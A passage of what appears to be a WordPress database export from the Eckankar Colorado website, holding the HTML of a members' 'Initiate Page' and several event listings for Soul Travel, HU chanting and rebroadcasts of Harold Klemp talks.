style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Initiator and ECK<br>\r\nSpiritual Aides</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px;\">Easily contact an ECK Initiator or request an ECK Spiritual Aide by filling out a simple form.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/\">Go Here To Get In Touch</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">State Leader<br>\r\nContacts</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Got a question or feedback for Colorado ECK leaders? Contact local RESA structure leaders.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/colorado-statewide-leadership-contacts/\">Contact an ECK Leader</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Add/Update Email<br>\r\nor Mail Address</p>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 17px; margin: 0px;\">Update your information to stay informed about all the ECK news in Colorado!<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/update-email-mail/\">Add/Update Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"tmpl-services-2 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #e8e5e5; box-shadow: #cecece 0px 2px 4px -1px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.67), rgba(255, 255, 255, 0.67)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\'); background-size: cover; background-position: 50% 50%;\" data-bg-overlaycolor-alpha=\"0.67\" data-bg-overlaycolor-class=\"1\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/sunset-gold-ocean-eagle-7.jpg\" data-bg-overlaycolor=\"rgba(255, 255, 255,0.67)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; margin-top: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-12 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-5 col-sm-6 col-xs-10 align-column-center col-lg-5\" style=\"padding-right: 1em; box-shadow: #cecece 0px 2px 4px -1px inset; padding-left: 0em;\">\r\n<div style=\"border: 5px solid; margin-right: -50px; z-index: 1; position: relative; padding-top: 0px; padding-bottom: 0px; border-color: #d5b56b !important; box-shadow: rgba(0, 0, 0, 0.3) 0px 19px 38px, rgba(0, 0, 0, 0.22) 0px 15px 12px;\" class=\" bg-box bg-alpha-209\" data-alpha=\"0.96\" data-bg-uuid=\"bg-alpha-209\">\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 2px 4px -1px inset; margin-left: -11px; margin-right: -15px;\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 color1-background-color color-1-text-contrast bg-background-color col-lg-6\" style=\"margin-left: -3px; padding: 1.5em;\">\r\n<div>\r\n<h2 class=\"color3-color\" style=\"font-size: 36px; text-align: center; font-family: \'Raleway\'; font-weight: 500;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Welcome</h2>\r\n<h4 class=\"\" style=\"font-size: 25px; text-align: center; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">ECk Initiates</h4>\r\n<h4 class=\"\" style=\"font-size: 23px;\"><br>\r\n<img class=\"aligncenter wp-image-68742 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/07/ek-sym-gold-sm.png\" alt=\"ECK Symbol\" width=\"71\" height=\"71\"></h4>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-sm-6 col-xs-12 align-column-center col-lg-6\">\r\n<div style=\"padding: 1em 1em 1em 1em;\" class=\"bg-box\">\r\n<p class=\"\" style=\"font-size: 24px; font-weight: 600; font-family: \'Raleway\'; color: rgba(62, 62, 62, 0.9);\" data-font-weight=\"600\" data-font-family=\"Raleway\" data-font-style=\"\">Divine love is not something you can talk about, but it is something that you can demonstrate as you live.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-2 col-lg-1\" style=\"background-color: #f5f2eb;\"></div>\r\n<div class=\"col-md-5 col-sm-5 col-xs-12 col-lg-5\" style=\"padding: 0em; background-color: #f5f2eb;\">\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-heart\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Donations</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">Giving to Eckankar in Colorado is simple. Your donations will help us continue to reach the public and grow Eckankar within the state. All donations of any size are greatly appreciated. </span></p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\"><span class=\"\">You Can Use PayPal or Credit Card.<br>\r\n<a href=\"https://www.paypal.com/donate?hosted_button_id=WAKYPRQYTCFXE\">Donate Online Now</a> (or by <a href=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Mail-in)</a></span></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\">\r\n<div></div>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-newspaper-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE Newsletter Signup</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Sign up to receive your local Initiate Newsletter!<br>\r\nGet all the latest news and events from around the state. <br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/newsletter-subscription-members/\">Sign Up Today!</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-check-square-o\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Email Whitelisting</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Whitelisting is the process of adding our email to an approved sender list, so emails from us will not be blocked or sent to spam.<br>\r\n<a class=\"\" href=\"https://eckankar-colorado.org/email-whitelisting/\">Learn How To Do It</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n<div class=\"row\" style=\"margin-top: 50px; margin-bottom: 50px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-2 col-lg-1\">\r\n<div><i class=\"fa fa-star\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px; color: #d5b56b;\" aria-hidden=\"true\"><span style=\"display: none;\">&nbsp;</span></i></div>\r\n</div>\r\n<div class=\"col-md-10 col-sm-9 col-xs-10 col-lg-10\">\r\n<div>\r\n<h3 class=\"\" style=\"margin-top: 0px; margin-bottom: 15px; font-family: \'Raleway\'; font-weight: 600; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Got a Vahana Project Idea?</h3>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Do you want to help serve the Mahanta’s mission and have a great idea to share? We want to know about it!</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px;\">Let us know how we can work together.<br>\r\n<a href=\"https://eckankar-colorado.org/chela-ideas/\">Click here to share the details</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-1 col-sm-1 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Initiate Page','','publish','closed','closed','','initiate-page','','','2023-10-27 17:18:09','2023-10-27 23:18:09','',0,'https://eckankar-colorado.org/?page_id=68102',0,'page','',0),(269206,0,'2023-10-14 08:25:44','2023-10-14 14:25:44','','','','publish','closed','closed','','269206','','','2023-10-14 08:25:44','2023-10-14 14:25:44','',0,'https://eckankar-colorado.org/nf_sub/269206/',0,'nf_sub','',0),(269207,0,'2023-10-15 09:43:41','2023-10-15 15:43:41','','','','publish','closed','closed','','269207','','','2023-10-15 09:43:41','2023-10-15 15:43:41','',0,'https://eckankar-colorado.org/nf_sub/269207/',0,'nf_sub','',0),(269208,0,'2023-10-15 19:35:19','2023-10-16 01:35:19','','','','publish','closed','closed','','269208','','','2023-10-15 19:35:19','2023-10-16 01:35:19','',0,'https://eckankar-colorado.org/nf_sub/269208/',0,'nf_sub','',0),(269209,0,'2023-10-16 15:56:27','2023-10-16 21:56:27','','','','publish','closed','closed','','269209','','','2023-10-16 15:56:27','2023-10-16 21:56:27','',0,'https://eckankar-colorado.org/nf_sub/269209/',0,'nf_sub','',0),(268930,0,'2023-08-20 11:26:09','2023-08-20 17:26:09','','','','publish','closed','closed','','268930','','','2023-08-20 11:26:09','2023-08-20 17:26:09','',0,'https://eckankar-colorado.org/nf_sub/268930/',0,'nf_sub','',0),(268934,15,'2023-08-26 11:41:45','2023-08-26 17:41:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Anyone Can</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Explore the God Worlds within you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>A close cousin to dreaming, Soul Travel is a natural ability.</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Soul Travel is a spiritual practice that enables you to explore the vast inner worlds of your own being whenever and wherever you like.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“In the simplest terms, Soul Travel is an individual moving closer to the heart of God.”</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">― Harold Klemp,&nbsp;<em>Spiritual Experiences Guidebook</em>, p. 21</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>References:</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Online:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about \'Soul Travel\' visit:&nbsp; <a href=\"https://www.eckankar.org/experience/soul-travel/\">Experience Soul Travel</a></span></p>\r\n<p class=\"mb-4\">&nbsp;</p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Book:</span></p>\r\n<p class=\"mb-4\"><a href=\"https://www.eckbooks.org/items/-92-0.html\"><span style=\"font-size: 14pt;\"><em>Past Lives, Dreams, and Soul Travel</em></span></a></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">by Harold Klemp</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Hundreds of pages of explanations, stories, and spiritual exercises!</span></p>\r\n<p class=\"mb-4\">&nbsp;</p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Web page for this SEGAMeetup:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.meetup.com/segofaurora/events/295455433/\" target=\"_blank\" rel=\"noopener\">SEGA Meetup</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGAM Zoom video | conference call Meetup will be on Wednesday, October 4th at 7:00 p.m. We will discuss ‘Spiritual Experiences’.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://meetup.com/SEGofAurora/events\" target=\"_blank\" rel=\"noopener\">SEGA Events</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span class=\"\" style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/295455433/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Soul Travel','','publish','closed','closed','','how-to-experience-gods-love-677-953-795-768','','','2023-08-26 11:41:45','2023-08-26 17:41:45','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268934',0,'mec-events','',0),(269330,2,'2023-11-02 17:01:11','2023-11-02 23:01:11','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Happiness is not a matter of how your outer life appears to someone else. Happiness is a state of consciousness.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Please join us at the</span><strong><span style=\"font-size: 14pt;\"> Colorado Springs ECK Center</span></strong><span style=\"font-size: 14pt;\"> for a rebroadcast of Sri Harold\'s Saturday evening talk from the recent 2023 ECKANKAR Soul Adventure Seminar held in Minneapolis, Minnesota.&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>','Video Rebroadcast - Sri Harold Klemp','','publish','closed','closed','','video-rebroadcast-sri-harold-klemp','','','2023-11-02 21:02:06','2023-11-03 03:02:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269330',0,'mec-events','',0),(268936,15,'2023-08-26 11:49:01','2023-08-26 17:49:01','','GoldenSunset','','inherit','closed','closed','','goldensunset','','','2023-08-26 11:49:01','2023-08-26 17:49:01','',268730,'https://eckankar-colorado.org/wp-content/uploads/2023/06/GoldenSunset.webp',0,'attachment','image/webp',0),(269319,0,'2023-10-29 21:54:09','2023-10-30 03:54:09','','','','publish','closed','closed','','269319','','','2023-10-29 21:54:09','2023-10-30 03:54:09','',0,'https://eckankar-colorado.org/nf_sub/269319/',0,'nf_sub','',0),(269320,0,'2023-10-31 09:29:30','2023-10-31 15:29:30','','','','publish','closed','closed','','269320','','','2023-10-31 09:29:30','2023-10-31 15:29:30','',0,'https://eckankar-colorado.org/nf_sub/269320/',0,'nf_sub','',0),(269321,0,'2023-11-01 15:27:46','2023-11-01 21:27:46','','','','publish','closed','closed','','269321','','','2023-11-01 15:27:46','2023-11-01 21:27:46','',0,'https://eckankar-colorado.org/nf_sub/269321/',0,'nf_sub','',0),(269325,2,'2023-11-02 14:28:25','2023-11-02 20:28:25','','hu-sos-golden-2','','inherit','closed','closed','','hu-sos-golden-2','','','2023-11-02 14:28:25','2023-11-02 20:28:25','',269324,'https://eckankar-colorado.org/wp-content/uploads/2023/11/hu-sos-golden-2.jpg',0,'attachment','image/jpeg',0),(269326,2,'2023-11-02 14:37:12','2023-11-02 20:37:12','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\' from the ECK Temple of Colorado. The program will be shown on a large TV for all to enjoy. You are warmly invited to join us for this in person event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Our Spiritual Wake-up Calls','','publish','closed','closed','','our-spiritual-wake-up-calls-2','','','2023-11-02 14:41:00','2023-11-02 20:41:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269326',0,'mec-events','',0),(269329,2,'2023-11-02 14:45:36','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Please join us for a rebroadcast of Sri Harold\'s Saturday evening talk from the 2023 ECKANKAR Soul Adventure Seminar. We\'ll also share seminar highlights from those who attended. This is an in-person event only. Watch Sri Harold Klemp’s Saturday evening talk at the 2022 ECK Soul Adventure Seminar, which was held October 21 - 23 in Minneapolis, Minnesota.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>','Video Rebroadcast --TEMPLATE','','draft','closed','closed','','','','','2023-11-02 14:45:36','2023-11-02 20:45:36','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269329',0,'mec-events','',0),(269328,2,'2023-11-02 14:40:34','2023-11-02 20:40:34','','skylight-1tree-1','','inherit','closed','closed','','skylight-1tree-1','','','2023-11-02 14:40:34','2023-11-02 20:40:34','',269326,'https://eckankar-colorado.org/wp-content/uploads/2023/11/skylight-1tree-1.jpg',0,'attachment','image/jpeg',0),(268940,15,'2023-08-27 08:40:16','2023-08-27 14:40:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Open Your Heart &amp; Spiritual Eye with the HU Mantra</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\" style=\"list-style-type: circle;\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a></span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\"><strong><span style=\"color: #1d5791;\">For online login information, just fill out the form below. Hope to see you there!<br>\r\n</span></strong></span></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Passkey to the Inner Worlds','','publish','closed','closed','','passkey-to-the-inner-worlds','','','2023-08-27 08:40:16','2023-08-27 14:40:16','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268940',0,'mec-events','',0),(269153,0,'2023-10-02 20:04:16','2023-10-03 02:04:16','','','','publish','closed','closed','','269153','','','2023-10-02 20:04:16','2023-10-03 02:04:16','',0,'https://eckankar-colorado.org/nf_sub/269153/',0,'nf_sub','',0),(269322,0,'2023-11-01 19:43:22','2023-11-02 